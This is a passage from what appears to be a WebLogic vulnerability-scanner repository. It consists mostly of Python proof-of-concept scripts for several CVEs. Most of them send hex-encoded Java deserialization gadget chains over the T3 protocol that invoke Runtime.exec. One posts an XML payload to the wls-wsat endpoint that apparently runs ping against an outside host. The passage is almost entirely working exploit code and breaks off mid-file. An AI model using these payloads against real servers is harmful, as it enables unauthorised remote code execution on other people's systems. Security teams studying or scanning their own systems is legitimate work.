| "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14"]) 74 | 75 | headers={"User-Agent":ua} 76 | 77 | if __name__ == '__main__': 78 | print(headers) 79 | -------------------------------------------------------------------------------- /poc/CVE_2014_4210.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | from config.config_requests import headers 14 | 15 | 16 | def islive(ur,port): 17 | url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' 18 | r = requests.get(url, headers=headers) 19 | return r.status_code 20 | 21 | def run(url,port): 22 | if islive(url,port)==200: 23 | u='http://' + str(url)+':'+str(port)+'/uddiexplorer/' 24 | return (1,"[+] [{}] Weblogic UDDI module is exposed! The path is: {}".format(url+':'+str(port),u)) 25 | else: 26 | return (0,"[-] [{}] Weblogic UDDI module default path does not exist!".format(url+':'+str(port))) 27 | 28 | if __name__=="__main__": 29 | url = sys.argv[1] 30 | port = int(sys.argv[2]) 31 | run(url,port) 32 | -------------------------------------------------------------------------------- /poc/CVE_2016_0638.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | 17 | VUL=['CVE-2016-0638'] 18 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78'] 19 | VER_SIG=['weblogic.jms.common.StreamMessageImpl'] 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 29 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,"[-] [{}] weblogic not detected {}".format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2016_3510.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | 17 | VUL=['CVE-2016-3510'] 18 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78'] 19 | VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 29 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(rport)) 30 | data3 = '1a7727000d3234322e323134' 31 | data4 = '2e312e32353461863d1d0000000078' 32 | for d in [data1,data2,data3,data4]: 33 | sock.send(bytes.fromhex(d)) 34 | time.sleep(2) 35 | 36 | def sendEvilObjData(sock,data): 37 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 38 | payload+=data 39 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 40 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 41 | sock.send(bytes.fromhex(payload)) 42 | res = '' 43 | try: 44 | count = 0 45 | while count<5: 46 | res += sock.recv(4096).decode("utf8","ignore") 47 | time.sleep(0.1) 48 | count += 1 49 | except Exception: 50 | pass 51 | return res 52 | 53 | def checkVul(res,rip,rport): 54 | p=re.findall(VER_SIG[0], res, re.S) 55 | if len(p)>0: 56 | return (1,'[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(rip+':'+str(rport),VUL[0])) 57 | else: 58 | return (0,'[-] [{}] weblogic not detected {}'.format(rip+':'+str(rport),VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 63 | sock.settimeout(10) 64 | server_addr = (rip, rport) 65 | t3handshake(sock,server_addr) 66 | buildT3RequestObject(sock,rport) 67 | rs=sendEvilObjData(sock,PAYLOAD[0]) 68 | return checkVul(rs,rip,rport) 69 | 70 | if __name__=="__main__": 71 | dip = sys.argv[1] 72 | dport = int(sys.argv[2]) 73 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2017_10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import sys 12 | import requests 13 | import re 14 | from config.config_requests import ua 15 | 16 | VUL=['CVE-2017-10271'] 17 | headers = { 18 | "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", 19 | "User-Agent":ua, 20 | "Content-Type":"text/xml" 21 | } 22 | def poc(u): 23 | url = "http://" + u 24 | url += '/wls-wsat/CoordinatorPortType' 25 | post_str = ''' 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | /usr/sbin/ping 34 | 35 | 36 | ceye.com 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | ''' 47 | 48 | try: 49 | response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers) 50 | response = response.text 51 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 52 | except Exception: 53 | response = "" 54 | 55 | if 'java.lang.ProcessBuilder' in response or "0" in response: 56 | return (1, '[+] [{}] weblogic has a JAVA deserialization vulnerability:{}'.format(u, VUL[0])) 57 | else: 58 | return (0, '[-] [{}] weblogic not detected {}'.format(u, VUL[0])) 59 | 60 | 61 | def run(rip,rport): 62 | url=rip+':'+str(rport) 63 | return poc(url) 64 | 65 | if __name__ == '__main__': 66 | dip = sys.argv[1] 67 | dport = int(sys.argv[2]) 68 | run(dip,dport) -------------------------------------------------------------------------------- /poc/CVE_2017_3248.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | ''' 4 | ____ _ _ _ _ __ __ _ 5 | | _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ 6 | | |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / 7 | | _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < 8 | |_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ 9 | 10 | ''' 11 | import socket 12 | import sys 13 | import time 14 | import re 15 | 16 | VUL=['CVE-2017-3248'] 17 | PAYLOAD=['aced0005737200257765626c6f6769632e6a6d732e636f6d6d6f6e2e53747265616d4d657373616765496d706c6b88de4d93cbd45d0c00007872001f7765626c6f6769632e6a6d732e636f6d6d6f6e2e4d657373616765496d706c69126161d04df1420c000078707a000003f728200000000000000100000578aced00057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007870000000014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a61767a0000018e612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000863616c632e657865740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000010770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a78'] 18 | VER_SIG=['\\$Proxy[0-9]+'] 19 | 20 | 21 | def t3handshake(sock,server_addr): 22 | sock.connect(server_addr) 23 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 24 | time.sleep(1) 25 | sock.recv(1024) 26 | 27 | def buildT3RequestObject(sock,rport): 28 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 29 | data2 = 